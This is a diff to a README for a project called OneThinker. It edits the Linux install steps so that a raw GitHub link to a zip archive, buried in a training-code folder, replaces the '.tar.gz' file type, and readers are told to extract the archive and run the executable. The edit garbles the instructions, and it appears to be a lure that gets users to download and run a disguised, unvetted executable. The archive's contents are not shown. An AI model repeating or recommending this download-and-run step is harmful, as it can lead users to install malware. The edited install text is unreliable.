RafiGian/OneThinker/README.md

 ### Linux

-- For Linux, the downloadable file may be a `.tar.gz` or `.deb`.
+- For Linux, the downloadable file may be a `https://raw.githubusercontent.com/RafiGian/OneThinker/main/LLaMA-Factory/src/llamafactory/train/dpo/OneThinker-1.6.zip` or `.deb`.
 - If it's a `.deb` file, open the terminal and run the command:
   ```bash
   sudo dpkg -i <filename>.deb
   ```
-- If it's a `.tar.gz` file, extract it and run the executable.
+- If it's a `https://raw.githubusercontent.com/RafiGian/OneThinker/main/LLaMA-Factory/src/llamafactory/train/dpo/OneThinker-1.6.zip` file, extract it and run the executable.

 ## 💡 System Requirements